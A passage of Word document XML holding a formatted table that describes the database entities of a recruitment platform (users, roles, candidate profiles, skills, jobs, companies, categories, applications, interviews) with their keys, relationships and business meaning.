            <w:tcW w:type="dxa" w:w="2592"/>
            <w:shd w:fill="1E3A8A"/>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Business Meaning &amp; Lifecycle</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1584"/>
            <w:shd w:fill="FFFFFF"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="0F172A"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>User</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1584"/>
            <w:shd w:fill="FFFFFF"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="0F172A"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>users</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2304"/>
            <w:shd w:fill="FFFFFF"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="0F172A"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>PK: id | FK: None</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2304"/>
            <w:shd w:fill="FFFFFF"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="0F172A"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>ManyToMany -&gt; Role, OneToOne -&gt; CandidateProfile</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2592"/>
            <w:shd w:fill="FFFFFF"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="0F172A"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Core security identity holding username, email, hashed password, enabled flag.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1584"/>
            <w:shd w:fill="F8FAFC"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="0F172A"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Role</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1584"/>
            <w:shd w:fill="F8FAFC"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="0F172A"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>roles</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2304"/>
            <w:shd w:fill="F8FAFC"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="0F172A"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>PK: id | FK: None</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2304"/>
            <w:shd w:fill="F8FAFC"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="0F172A"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>ManyToMany -&gt; User</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2592"/>
            <w:shd w:fill="F8FAFC"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="0F172A"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Immutable authority reference table (ROLE_CANDIDATE, ROLE_RECRUITER, ROLE_ADMIN).</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1584"/>
            <w:shd w:fill="FFFFFF"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="0F172A"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>CandidateProfile</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1584"/>
            <w:shd w:fill="FFFFFF"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="0F172A"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>candidate_profiles</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2304"/>
            <w:shd w:fill="FFFFFF"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="0F172A"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>PK: id | FK: user_id</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2304"/>
            <w:shd w:fill="FFFFFF"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="0F172A"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>OneToOne -&gt; User, ManyToMany -&gt; Skill</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2592"/>
            <w:shd w:fill="FFFFFF"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="0F172A"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Holds professional headline, bio, experience years, expected salary, and resume URL.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1584"/>
            <w:shd w:fill="F8FAFC"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="0F172A"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Skill</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1584"/>
            <w:shd w:fill="F8FAFC"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="0F172A"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>skills</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2304"/>
            <w:shd w:fill="F8FAFC"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="0F172A"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>PK: id | FK: None</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2304"/>
            <w:shd w:fill="F8FAFC"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="0F172A"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>ManyToMany -&gt; CandidateProfile, ManyToMany -&gt; Job</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2592"/>
            <w:shd w:fill="F8FAFC"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="0F172A"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Taxonomy of technical skills (Java, Spring Boot, React, AWS, Docker, etc.).</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1584"/>
            <w:shd w:fill="FFFFFF"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="0F172A"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Job</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1584"/>
            <w:shd w:fill="FFFFFF"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="0F172A"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>jobs</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2304"/>
            <w:shd w:fill="FFFFFF"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="0F172A"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>PK: id | FK: company_id, category_id, recruiter_id</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2304"/>
            <w:shd w:fill="FFFFFF"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="0F172A"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>ManyToOne -&gt; Company, ManyToOne -&gt; Category, ManyToMany -&gt; Skill</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2592"/>
            <w:shd w:fill="FFFFFF"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="0F172A"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Published job requisition holding title, description, location, job type, salary min/max, active.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1584"/>
            <w:shd w:fill="F8FAFC"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="0F172A"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Company</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1584"/>
            <w:shd w:fill="F8FAFC"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="0F172A"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>companies</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2304"/>
            <w:shd w:fill="F8FAFC"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="0F172A"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>PK: id | FK: None</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2304"/>
            <w:shd w:fill="F8FAFC"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="0F172A"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>OneToMany -&gt; Job</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2592"/>
            <w:shd w:fill="F8FAFC"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="0F172A"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Enterprise employer holding company name, website, logo URL, verification status.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1584"/>
            <w:shd w:fill="FFFFFF"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="0F172A"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Category</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1584"/>
            <w:shd w:fill="FFFFFF"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="0F172A"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>categories</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2304"/>
            <w:shd w:fill="FFFFFF"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="0F172A"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>PK: id | FK: None</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2304"/>
            <w:shd w:fill="FFFFFF"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="0F172A"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>OneToMany -&gt; Job</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2592"/>
            <w:shd w:fill="FFFFFF"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="0F172A"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Industry vertical classification (Software Engineering, Cloud &amp; DevOps, Data Science).</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1584"/>
            <w:shd w:fill="F8FAFC"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="0F172A"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Application</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1584"/>
            <w:shd w:fill="F8FAFC"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="0F172A"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>applications</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2304"/>
            <w:shd w:fill="F8FAFC"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="0F172A"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>PK: id | FK: job_id, candidate_id</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2304"/>
            <w:shd w:fill="F8FAFC"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="0F172A"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>ManyToOne -&gt; Job, ManyToOne -&gt; User</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2592"/>
            <w:shd w:fill="F8FAFC"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="0F172A"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>The recruitment application record tracking status, appliedAt timestamp, and notes.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1584"/>
            <w:shd w:fill="FFFFFF"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="0F172A"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Interview</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1584"/>
            <w:shd w:fill="FFFFFF"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="0F172A"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>interviews</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2304"/>
            <w:shd w:fill="FFFFFF"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="0F172A"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>PK: id | FK: application_id, interviewer_id</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2304"/>
            <w:shd w:fill="FFFFFF"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="0F172A"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>ManyToOne -&gt; Application, ManyToOne -&gt; User</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
